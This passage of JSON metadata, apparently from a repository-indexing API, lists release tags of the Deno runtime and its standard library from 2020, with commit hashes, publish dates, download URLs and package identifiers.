.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/s